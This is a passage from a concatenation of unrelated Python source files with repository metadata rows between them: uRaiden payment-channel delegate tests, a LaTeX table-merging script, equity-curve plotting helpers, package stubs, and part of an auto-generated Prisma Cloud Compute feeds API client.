    txdata = bytes.fromhex(sender[2:] + receiver[2:])

    # Delegate contract is a trusted contract
    assert uraiden_instance.call().trusted_contracts(delegate_instance.address)

    # Fund delegate contract with tokens
    token_instance.transact({"from": owner}).transfer(delegate_instance.address, deposit + 100)

    # Create channel through delegate
    txn_hash = delegate_instance.transact({"from": sender}).createChannelERC223(deposit, txdata)

    # Make sure the channel was created between sender and receiver
    open_block_number = get_block(txn_hash)
    channel_data = uraiden_instance.call().getChannelInfo(sender, receiver, open_block_number)
    # channel_data layout: (key, deposit, settle_block_number, closing_balance)
    assert channel_data[0] == uraiden_instance.call().getKey(
        sender,
        receiver,
        open_block_number
    )
    assert channel_data[1] == deposit
    assert channel_data[2] == 0
    assert channel_data[3] == 0
def test_channel_erc20_create_delegate(
        owner,
        get_accounts,
        uraiden_instance,
        token_instance,
        delegate_instance,
        get_block):
    """A trusted delegate contract can open a channel via the ERC20 path."""
    (sender, receiver) = get_accounts(2)
    deposit = 1000

    # Delegate contract is a trusted contract
    assert uraiden_instance.call().trusted_contracts(delegate_instance.address)

    # Fund delegate with tokens
    token_instance.transact({"from": owner}).transfer(delegate_instance.address, deposit + 100)

    # Create channel through delegate
    txn_hash = delegate_instance.transact(
        {"from": sender}
    ).createChannelERC20(sender, receiver, deposit)

    # Make sure the channel was created between sender and receiver
    open_block_number = get_block(txn_hash)
    channel_data = uraiden_instance.call().getChannelInfo(sender, receiver, open_block_number)
    # channel_data layout: (key, deposit, settle_block_number, closing_balance)
    assert channel_data[0] == uraiden_instance.call().getKey(
        sender,
        receiver,
        open_block_number
    )
    assert channel_data[1] == deposit
    assert channel_data[2] == 0
    assert channel_data[3] == 0
def test_channel_erc223_topup_delegate(
        owner,
        uraiden_instance,
        token_instance,
        delegate_instance,
        get_channel
):
    """A trusted delegate can top up an existing channel via the ERC223 path."""
    deposit = 1000
    deposit_topup = 200
    (sender, receiver, open_block_number) = get_channel(
        uraiden_instance,
        token_instance,
        deposit
    )[:3]
    # ERC223 top-up data: sender address + receiver address + open block
    # number as an 8-hex-digit (4-byte) zero-padded value.
    txdata = sender[2:] + receiver[2:] + hex(open_block_number)[2:].zfill(8)
    txdata = bytes.fromhex(txdata)

    # Delegate contract is a trusted contract
    assert uraiden_instance.call().trusted_contracts(delegate_instance.address)

    # Fund delegate with tokens
    token_instance.transact(
        {"from": owner}
    ).transfer(delegate_instance.address, deposit_topup + 100)

    # Top up channel through delegate
    delegate_instance.transact({"from": sender}).topUpERC223(deposit_topup, txdata)

    # Check channel deposit
    channel_data = uraiden_instance.call().getChannelInfo(sender, receiver, open_block_number)
    assert channel_data[1] == deposit + deposit_topup
def test_channel_erc20_topup_delegate(
        owner,
        uraiden_instance,
        token_instance,
        delegate_instance,
        get_channel
):
    """A trusted delegate can top up an existing channel via the ERC20 path."""
    deposit = 1000
    deposit_topup = 200
    sender, receiver, open_block_number = get_channel(
        uraiden_instance,
        token_instance,
        deposit
    )[:3]

    # The delegate must be whitelisted before it may act on channels.
    assert uraiden_instance.call().trusted_contracts(delegate_instance.address)

    # Fund the delegate with exactly the top-up amount.
    token_instance.transact({"from": owner}).transfer(
        delegate_instance.address, deposit_topup
    )

    # Top up through the delegate, then verify the increased deposit.
    delegate_instance.transact({"from": sender}).topUpERC20(
        sender,
        receiver,
        open_block_number,
        deposit_topup
    )
    channel_data = uraiden_instance.call().getChannelInfo(
        sender, receiver, open_block_number
    )
    assert channel_data[1] == deposit + deposit_topup
def test_delegate_remove_trusted_contract(
        owner,
        get_accounts,
        uraiden_instance,
        token_instance,
        delegate_instance):
    """Once untrusted, a delegate can no longer create channels."""
    sender, receiver = get_accounts(2)
    deposit = 1000

    # Fund the delegate generously so a lack of tokens cannot be the
    # reason a later call fails.
    token_instance.transact({"from": owner}).transfer(
        delegate_instance.address, deposit * 3
    )

    # While trusted, channel creation through the delegate succeeds.
    delegate_instance.transact({"from": sender}).createChannelERC20(
        sender, receiver, deposit
    )

    # Revoke the delegate's trusted status.
    uraiden_instance.transact({"from": owner}).removeTrustedContracts(
        [delegate_instance.address]
    )

    # The same call through the now-untrusted delegate must revert.
    with pytest.raises(tester.TransactionFailed):
        delegate_instance.transact({"from": sender}).createChannelERC20(
            sender, receiver, deposit
        )
| 31.228395
| 98
| 0.699545
| 562
| 5,059
| 6.049822
| 0.13879
| 0.098824
| 0.070588
| 0.074412
| 0.857353
| 0.848824
| 0.848824
| 0.837941
| 0.831471
| 0.759412
| 0
| 0.0214
| 0.214865
| 5,059
| 161
| 99
| 31.42236
| 0.834592
| 0.136391
| 0
| 0.720721
| 0
| 0
| 0.01104
| 0
| 0
| 0
| 0
| 0
| 0.126126
| 1
| 0.045045
| false
| 0
| 0.018018
| 0
| 0.063063
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
becf06596a00df56f753962b24ed1f5eafd162d0
| 6,603
|
py
|
Python
|
benchmarks/tables/mix-files.py
|
vsahil/influence-duplicate
|
ae5bc77be6dcb7d69054a520733c373d833552da
|
[
"MIT"
] | null | null | null |
benchmarks/tables/mix-files.py
|
vsahil/influence-duplicate
|
ae5bc77be6dcb7d69054a520733c373d833552da
|
[
"MIT"
] | null | null | null |
benchmarks/tables/mix-files.py
|
vsahil/influence-duplicate
|
ae5bc77be6dcb7d69054a520733c373d833552da
|
[
"MIT"
] | 1
|
2021-11-03T06:53:18.000Z
|
2021-11-03T06:53:18.000Z
|
import sys, os
def min_discm_mix(scientific_notation):
    """Merge three row-aligned LaTeX table fragments into one table.

    Combines, row by row, the minimum-discrimination column file with the
    matching test-accuracy and parity-difference files, checking that the
    experiment ID (the first ``&``-separated cell) agrees across all three.
    Merged rows go to ``min-discm-model_scientific.tex`` or
    ``min-discm-model_floating.tex`` depending on *scientific_notation*.

    :param scientific_notation: if True, use the scientific-notation
        variant of the input/output file names; otherwise floating-point.
    :raises ValueError: when a data row lacks a ``&`` separator or the
        experiment IDs disagree (the original dropped into ipdb here).
    """
    print(scientific_notation)
    suffix = "scientific" if scientific_notation else "floating"

    with open(f"min-discm_{suffix}.tex", "r") as fin:
        content_min_discm = fin.readlines()
    with open("test_accuracy_for_min_discm.tex", "r") as fin:
        content_max_accuracy = fin.readlines()
    with open("parity-diff-min-discm_fulltest.tex", "r") as fin:
        content_parity = fin.readlines()

    write_file = f"min-discm-model_{suffix}.tex"
    if os.path.exists(write_file):
        os.remove(write_file)  # os.remove instead of shelling out to `rm`

    # Open the output once instead of re-opening it for every row.
    with open(write_file, "a") as out:
        for l1, l2, l3 in zip(content_min_discm, content_max_accuracy, content_parity):
            # Strip the LaTeX row terminators from the first two fragments;
            # the third keeps its terminator so the merged row still ends a
            # LaTeX table row. Pattern order matters: the bare "\\" form is
            # a substring of the other two.
            for pattern in (" \\\\ \n", " \\\\ \\midrule\n", "\\\\"):
                l1 = l1.replace(pattern, "")
                l2 = l2.replace(pattern, "")
            if "midrule" in l1:
                assert "midrule" in l2 and "midrule" in l3
                mix = '\\midrule\n'
            else:
                # The experiment ID is the first column of every fragment.
                experiment1 = l1.split("&")[0].strip()
                experiment2 = l2.split("&")[0].strip()
                experiment3 = l3.split("&")[0].strip()
                if not (experiment1 == experiment2 == experiment3):
                    raise ValueError(
                        "experiment IDs disagree: %r, %r, %r"
                        % (experiment1, experiment2, experiment3)
                    )
                try:
                    # Drop the experiment ID, keeping the "&" separators.
                    l1 = l1[l1.index("&"):]
                    l2 = l2[l2.index("&"):]
                    l3 = l3[l3.index("&"):]
                except ValueError as err:
                    raise ValueError("row without '&' separator: %r" % l1) from err
                mix = experiment1 + " " + l1 + l2 + l3  # l3 retains the breakline
            print(mix, end="", file=out)
def max_accuracy_mix(scientific_notation):
    """Merge three row-aligned LaTeX table fragments into one table.

    Combines, row by row, the discrimination-at-max-accuracy column file
    with the matching max-test-accuracy and parity-difference files,
    checking that the experiment ID (the first ``&``-separated cell)
    agrees across all three. Merged rows go to
    ``max-accuracy-model_scientific.tex`` or
    ``max-accuracy-model_floating.tex`` depending on *scientific_notation*.

    :param scientific_notation: if True, use the scientific-notation
        variant of the input/output file names; otherwise floating-point.
    :raises ValueError: when a data row lacks a ``&`` separator or the
        experiment IDs disagree (the original dropped into ipdb here).
    """
    print(scientific_notation)
    suffix = "scientific" if scientific_notation else "floating"

    with open(f"discm_for_max_accuracy_{suffix}.tex", "r") as fin:
        content_min_discm = fin.readlines()
    with open("max-test-accuracy.tex", "r") as fin:
        content_max_accuracy = fin.readlines()
    with open("parity-diff-max-accuracy_fulltest.tex", "r") as fin:
        content_parity = fin.readlines()

    write_file = f"max-accuracy-model_{suffix}.tex"
    if os.path.exists(write_file):
        os.remove(write_file)  # os.remove instead of shelling out to `rm`

    # Open the output once instead of re-opening it for every row.
    with open(write_file, "a") as out:
        for l1, l2, l3 in zip(content_min_discm, content_max_accuracy, content_parity):
            # Strip the LaTeX row terminators from the first two fragments;
            # the third keeps its terminator so the merged row still ends a
            # LaTeX table row. Pattern order matters: the bare "\\" form is
            # a substring of the other two.
            for pattern in (" \\\\ \n", " \\\\ \\midrule\n", "\\\\"):
                l1 = l1.replace(pattern, "")
                l2 = l2.replace(pattern, "")
            if "midrule" in l1:
                assert "midrule" in l2 and "midrule" in l3
                mix = '\\midrule\n'
            else:
                # The experiment ID is the first column of every fragment.
                experiment1 = l1.split("&")[0].strip()
                experiment2 = l2.split("&")[0].strip()
                experiment3 = l3.split("&")[0].strip()
                if not (experiment1 == experiment2 == experiment3):
                    raise ValueError(
                        "experiment IDs disagree: %r, %r, %r"
                        % (experiment1, experiment2, experiment3)
                    )
                try:
                    # Drop the experiment ID, keeping the "&" separators.
                    l1 = l1[l1.index("&"):]
                    l2 = l2[l2.index("&"):]
                    l3 = l3[l3.index("&"):]
                except ValueError as err:
                    raise ValueError("row without '&' separator: %r" % l1) from err
                mix = experiment1 + " " + l1 + l2 + l3  # l3 retains the breakline
            print(mix, end="", file=out)
def min_parity_mix(scientific_notation):
    """Merge three row-aligned LaTeX table fragments into one table.

    Combines, row by row, the discrimination-at-min-parity column file
    with the matching test-accuracy and min-parity-difference files,
    checking that the experiment ID (the first ``&``-separated cell)
    agrees across all three. Merged rows go to
    ``min-parity-model_scientific.tex`` or
    ``min-parity-model_floating.tex`` depending on *scientific_notation*.

    :param scientific_notation: if True, use the scientific-notation
        variant of the input/output file names; otherwise floating-point.
    :raises ValueError: when a data row lacks a ``&`` separator or the
        experiment IDs disagree (the original dropped into ipdb here).
    """
    print(scientific_notation)
    suffix = "scientific" if scientific_notation else "floating"

    with open(f"discm_for_min_parity_{suffix}.tex", "r") as fin:
        content_min_discm = fin.readlines()
    with open("test_accuracy_for_min_parity.tex", "r") as fin:
        content_max_accuracy = fin.readlines()
    with open("min-parity-diff_fulltest.tex", "r") as fin:
        content_parity = fin.readlines()

    write_file = f"min-parity-model_{suffix}.tex"
    if os.path.exists(write_file):
        os.remove(write_file)  # os.remove instead of shelling out to `rm`

    # Open the output once instead of re-opening it for every row.
    with open(write_file, "a") as out:
        for l1, l2, l3 in zip(content_min_discm, content_max_accuracy, content_parity):
            # Strip the LaTeX row terminators from the first two fragments;
            # the third keeps its terminator so the merged row still ends a
            # LaTeX table row. Pattern order matters: the bare "\\" form is
            # a substring of the other two.
            for pattern in (" \\\\ \n", " \\\\ \\midrule\n", "\\\\"):
                l1 = l1.replace(pattern, "")
                l2 = l2.replace(pattern, "")
            if "midrule" in l1:
                assert "midrule" in l2 and "midrule" in l3
                mix = '\\midrule\n'
            else:
                # The experiment ID is the first column of every fragment.
                experiment1 = l1.split("&")[0].strip()
                experiment2 = l2.split("&")[0].strip()
                experiment3 = l3.split("&")[0].strip()
                if not (experiment1 == experiment2 == experiment3):
                    raise ValueError(
                        "experiment IDs disagree: %r, %r, %r"
                        % (experiment1, experiment2, experiment3)
                    )
                try:
                    # Drop the experiment ID, keeping the "&" separators.
                    l1 = l1[l1.index("&"):]
                    l2 = l2[l2.index("&"):]
                    l3 = l3[l3.index("&"):]
                except ValueError as err:
                    raise ValueError("row without '&' separator: %r" % l1) from err
                mix = experiment1 + " " + l1 + l2 + l3  # l3 retains the breakline
            print(mix, end="", file=out)
if __name__ == "__main__":
    # Emit both notation variants (scientific first, then floating) of
    # each merged table, in the same order as before.
    for table_mix in (min_discm_mix, max_accuracy_mix, min_parity_mix):
        for notation in (True, False):
            table_mix(notation)
| 34.212435
| 101
| 0.529759
| 776
| 6,603
| 4.351804
| 0.104381
| 0.021321
| 0.029316
| 0.040865
| 0.948475
| 0.923601
| 0.890435
| 0.859046
| 0.859046
| 0.859046
| 0
| 0.038589
| 0.317129
| 6,603
| 193
| 102
| 34.212435
| 0.710357
| 0.092079
| 0
| 0.818182
| 0
| 0
| 0.160101
| 0.092372
| 0
| 0
| 0
| 0
| 0.041958
| 1
| 0.020979
| false
| 0
| 0.048951
| 0
| 0.06993
| 0.041958
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bef9d3b7e06ff1065b8cec7b0f33e0fc00081e1e
| 2,528
|
py
|
Python
|
python/equityplot.py
|
lich666dead/ml-framework
|
e8c42ec610e907f263f03f5c776a48a553dd7c28
|
[
"MIT"
] | 3
|
2017-10-28T14:50:18.000Z
|
2017-11-12T13:35:05.000Z
|
python/equityplot.py
|
lich666dead/ml-framework
|
e8c42ec610e907f263f03f5c776a48a553dd7c28
|
[
"MIT"
] | null | null | null |
python/equityplot.py
|
lich666dead/ml-framework
|
e8c42ec610e907f263f03f5c776a48a553dd7c28
|
[
"MIT"
] | 2
|
2017-10-28T14:51:46.000Z
|
2018-08-05T10:36:38.000Z
|
from matplotlib.dates import YearLocator, MonthLocator, DateFormatter
import datetime
import matplotlib.pyplot as plt
import numpy as np
def plotequity_pred(pred, res, title, dataformat="%Y-%m-%d"):
    """Plot the cumulative equity of a strategy driven by *pred*.

    Takes a +1/-1/0 position from the sign of each prediction, multiplies
    it by the per-period results *res*, cumulates the product, and draws
    it (green) against the cumulative raw result (black).

    :param pred: array-like of predictions; only the sign is used.
    :param res: pandas Series of results indexed by date strings
        (assumed parseable with *dataformat* — TODO confirm with callers).
    :param title: figure title.
    :param dataformat: strptime format of the index labels.
    """
    mydpi = 96
    plt.close("all")
    # Sign of the prediction decides the position: long, short or flat.
    # (The original compared against -0, which is identical to 0.)
    pos = np.where(pred > 0, 1, np.where(pred < 0, -1, 0))
    eq = np.cumsum(pos * res)
    fig = plt.figure(figsize=(1800 / mydpi, 1000 / mydpi), dpi=mydpi)
    ax = fig.add_subplot(111)
    ax.autoscale_view()
    # (Removed leftover debug print of res.head().)
    years = YearLocator()    # major tick: every year
    months = MonthLocator()  # minor tick: every month
    yearsFmt = DateFormatter('%Y')
    ax.xaxis.set_major_locator(years)
    ax.xaxis.set_major_formatter(yearsFmt)
    ax.xaxis.set_minor_locator(months)
    # X limits: the 1st of January bracketing the data's year range.
    datemin = datetime.date(
        datetime.datetime.strptime(res.index.min(), dataformat).year, 1, 1)
    datemax = datetime.date(
        datetime.datetime.strptime(res.index.max(), dataformat).year + 1, 1, 1)
    ax.set_xlim(datemin, datemax)
    ax.fmt_xdata = DateFormatter('%Y-%m-%d')
    ax.plot(res.index, eq.values, color="green")
    ax.plot(res.index, np.cumsum(res).values, color="black")
    fig.autofmt_xdate()
    plt.title(title)
    plt.show()
def plotequity_trades(trades, res=None, title="Title", dataformat="%Y-%m-%d"):
    """Plot the cumulative equity of a series of trade results.

    Draws the cumulative sum of *trades* (green) and, when *res* is
    given, the cumulative raw result (black) for comparison.

    Bug fix: the original dereferenced ``res.index`` unconditionally for
    the x-axis limits, so the documented default ``res=None`` always
    raised AttributeError. The limits now fall back to ``trades.index``.

    :param trades: pandas Series of trade results indexed by date strings.
    :param res: optional pandas Series of raw results, same index style.
    :param title: figure title.
    :param dataformat: strptime format of the index labels.
    """
    mydpi = 96
    plt.close("all")
    eq = np.cumsum(trades)
    fig = plt.figure(figsize=(1800 / mydpi, 1000 / mydpi), dpi=mydpi)
    ax = fig.add_subplot(111)
    ax.autoscale_view()
    years = YearLocator()    # major tick: every year
    months = MonthLocator()  # minor tick: every month
    yearsFmt = DateFormatter('%Y')
    ax.xaxis.set_major_locator(years)
    ax.xaxis.set_major_formatter(yearsFmt)
    ax.xaxis.set_minor_locator(months)
    # X limits from res when provided (as before), otherwise from trades.
    index = trades.index if res is None else res.index
    datemin = datetime.date(
        datetime.datetime.strptime(index.min(), dataformat).year, 1, 1)
    datemax = datetime.date(
        datetime.datetime.strptime(index.max(), dataformat).year + 1, 1, 1)
    ax.set_xlim(datemin, datemax)
    ax.fmt_xdata = DateFormatter('%Y-%m-%d')
    ax.plot(trades.index, eq.values, color="green")
    if res is not None:
        ax.plot(res.index, np.cumsum(res).values, color="black")
    fig.autofmt_xdate()
    plt.title(title)
    plt.show()
def plotequity_pl(trades, title="Title"):
    """Plot the cumulative P&L curve of every trade series in *trades*."""
    dpi = 96
    plt.close("all")
    fig = plt.figure(figsize=(1800 / dpi, 1000 / dpi), dpi=dpi)
    ax = fig.add_subplot(111)
    ax.autoscale_view()
    # One green cumulative curve per series, indexed 0..len-1 on x.
    for series in trades:
        curve = np.cumsum(series)
        ax.plot(range(curve.shape[0]), curve, color="green")
    plt.title(title)
    plt.show()
| 30.829268
| 97
| 0.651108
| 355
| 2,528
| 4.560563
| 0.24507
| 0.034589
| 0.03706
| 0.03706
| 0.809141
| 0.741198
| 0.741198
| 0.741198
| 0.741198
| 0.741198
| 0
| 0.027573
| 0.196598
| 2,528
| 82
| 98
| 30.829268
| 0.769572
| 0.017801
| 0
| 0.725806
| 0
| 0
| 0.032271
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048387
| false
| 0
| 0.064516
| 0
| 0.112903
| 0.016129
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8339cee41f31c8370b1be36cd34369a947fce05d
| 69
|
py
|
Python
|
paz/backend/image/__init__.py
|
dema-software-solutions/paz-1
|
e75ab1ba5b0980ee76ae6bd95545497665d69304
|
[
"MIT"
] | null | null | null |
paz/backend/image/__init__.py
|
dema-software-solutions/paz-1
|
e75ab1ba5b0980ee76ae6bd95545497665d69304
|
[
"MIT"
] | null | null | null |
paz/backend/image/__init__.py
|
dema-software-solutions/paz-1
|
e75ab1ba5b0980ee76ae6bd95545497665d69304
|
[
"MIT"
] | null | null | null |
from .opencv_image import *
from .image import *
from .draw import *
| 17.25
| 27
| 0.73913
| 10
| 69
| 5
| 0.5
| 0.44
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 69
| 3
| 28
| 23
| 0.877193
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3603cd26868e12093e1d6f88d01d546328685a69
| 140
|
py
|
Python
|
construct_hou/menus.py
|
construct-org/construct_hou
|
7c323c176ce238681f64cbf61ddd7ed5a9a81100
|
[
"MIT"
] | null | null | null |
construct_hou/menus.py
|
construct-org/construct_hou
|
7c323c176ce238681f64cbf61ddd7ed5a9a81100
|
[
"MIT"
] | null | null | null |
construct_hou/menus.py
|
construct-org/construct_hou
|
7c323c176ce238681f64cbf61ddd7ed5a9a81100
|
[
"MIT"
] | 1
|
2020-02-15T12:16:21.000Z
|
2020-02-15T12:16:21.000Z
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
def setup_construct_menu():
    '''Setup the Construct Action menu.

    Placeholder hook: currently performs no work and returns None.
    '''
    return None
| 17.5
| 38
| 0.685714
| 17
| 140
| 5.235294
| 0.764706
| 0.314607
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008772
| 0.185714
| 140
| 7
| 39
| 20
| 0.77193
| 0.357143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
3629e761fb241df6774d351cc8cb855d2680577b
| 80,711
|
py
|
Python
|
openapi_client/api/feeds_api.py
|
hi-artem/twistlock-py
|
9888e905f5b9d3cc00f9b84244588c0992f8e4f4
|
[
"RSA-MD"
] | null | null | null |
openapi_client/api/feeds_api.py
|
hi-artem/twistlock-py
|
9888e905f5b9d3cc00f9b84244588c0992f8e4f4
|
[
"RSA-MD"
] | null | null | null |
openapi_client/api/feeds_api.py
|
hi-artem/twistlock-py
|
9888e905f5b9d3cc00f9b84244588c0992f8e4f4
|
[
"RSA-MD"
] | null | null | null |
# coding: utf-8
"""
Prisma Cloud Compute API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 21.04.439
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from openapi_client.api_client import ApiClient
from openapi_client.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class FeedsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def api_v1_feeds_bundle_get(self, **kwargs):  # noqa: E501
    """api_v1_feeds_bundle_get  # noqa: E501

    DownloadFeedsBundle creates and serves the intelligence feeds bundle.  # noqa: E501

    Convenience wrapper around
    :meth:`api_v1_feeds_bundle_get_with_http_info` that returns only the
    response data, discarding status code and headers. Accepts the same
    keyword arguments; pass ``async_req=True`` for an asynchronous request
    (the request thread is returned instead).

    :return: the result object (or the request thread when async).
    :rtype: None
    """
    # Force data-only mode, then delegate the real work.
    kwargs.update(_return_http_data_only=True)
    return self.api_v1_feeds_bundle_get_with_http_info(**kwargs)  # noqa: E501
def api_v1_feeds_bundle_get_with_http_info(self, **kwargs):  # noqa: E501
    """api_v1_feeds_bundle_get  # noqa: E501

    DownloadFeedsBundle creates and serves the intelligence feeds bundle  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.api_v1_feeds_bundle_get_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :param _request_auth: set to override the auth_settings for an a single
                          request; this effectively ignores the authentication
                          in the spec for a single request.
    :type _request_auth: dict, optional
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: None
    """
    # Snapshot of the named parameters plus the raw **kwargs dict; kwargs
    # entries are validated and folded in below (generator convention).
    local_var_params = locals()

    # This endpoint declares no operation-specific parameters; only the
    # generic client options below are accepted.
    all_params = [
    ]
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout',
            '_request_auth'
        ]
    )

    # Reject any keyword argument the operation does not define.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method api_v1_feeds_bundle_get" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    collection_formats = {}

    # No path, query, header, form or body parameters for this endpoint.
    path_params = {}

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # Authentication setting
    auth_settings = []  # noqa: E501

    # No declared response types: the body is not decoded into a model.
    response_types_map = {}

    return self.api_client.call_api(
        '/api/v1/feeds/bundle', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
def api_v1_feeds_bundle_put(self, **kwargs):  # noqa: E501
    """api_v1_feeds_bundle_put  # noqa: E501

    UploadOfflineIntelligenceFeeds uploads the offline intelligence feeds bundle.  # noqa: E501

    Convenience wrapper around
    :meth:`api_v1_feeds_bundle_put_with_http_info` that returns only the
    response data, discarding status code and headers. Accepts the same
    keyword arguments; pass ``async_req=True`` for an asynchronous request
    (the request thread is returned instead).

    :return: the result object (or the request thread when async).
    :rtype: None
    """
    # Force data-only mode, then delegate the real work.
    kwargs.update(_return_http_data_only=True)
    return self.api_v1_feeds_bundle_put_with_http_info(**kwargs)  # noqa: E501
def api_v1_feeds_bundle_put_with_http_info(self, **kwargs):  # noqa: E501
    """api_v1_feeds_bundle_put  # noqa: E501

    UploadOfflineIntelligenceFeeds uploads the offline intelligence feeds bundle  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.api_v1_feeds_bundle_put_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :param _request_auth: set to override the auth_settings for an a single
                          request; this effectively ignores the authentication
                          in the spec for a single request.
    :type _request_auth: dict, optional
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: None
    """
    # Snapshot of the named parameters plus the raw **kwargs dict; kwargs
    # entries are validated and folded in below (generator convention).
    local_var_params = locals()

    # This endpoint declares no operation-specific parameters; only the
    # generic client options below are accepted.
    all_params = [
    ]
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout',
            '_request_auth'
        ]
    )

    # Reject any keyword argument the operation does not define.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method api_v1_feeds_bundle_put" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    collection_formats = {}

    # No path, query, header, form or body parameters for this endpoint.
    path_params = {}

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # Authentication setting
    auth_settings = []  # noqa: E501

    # No declared response types: the body is not decoded into a model.
    response_types_map = {}

    return self.api_client.call_api(
        '/api/v1/feeds/bundle', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
def api_v1_feeds_custom_custom_vulnerabilities_digest_get(self, **kwargs):  # noqa: E501
    """api_v1_feeds_custom_custom_vulnerabilities_digest_get  # noqa: E501

    CustomVulnerabilitiesDigest returns the custom vulnerabilities feed digest.  # noqa: E501

    Convenience wrapper around
    :meth:`api_v1_feeds_custom_custom_vulnerabilities_digest_get_with_http_info`
    that returns only the response data, discarding status code and headers.
    Accepts the same keyword arguments; pass ``async_req=True`` for an
    asynchronous request (the request thread is returned instead).

    :return: the digest string (or the request thread when async).
    :rtype: str
    """
    # Force data-only mode, then delegate the real work.
    kwargs.update(_return_http_data_only=True)
    return self.api_v1_feeds_custom_custom_vulnerabilities_digest_get_with_http_info(**kwargs)  # noqa: E501
def api_v1_feeds_custom_custom_vulnerabilities_digest_get_with_http_info(self, **kwargs):  # noqa: E501
    """api_v1_feeds_custom_custom_vulnerabilities_digest_get  # noqa: E501

    CustomVulnerabilitiesDigest returns the custom vulnerabilities feed digest  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
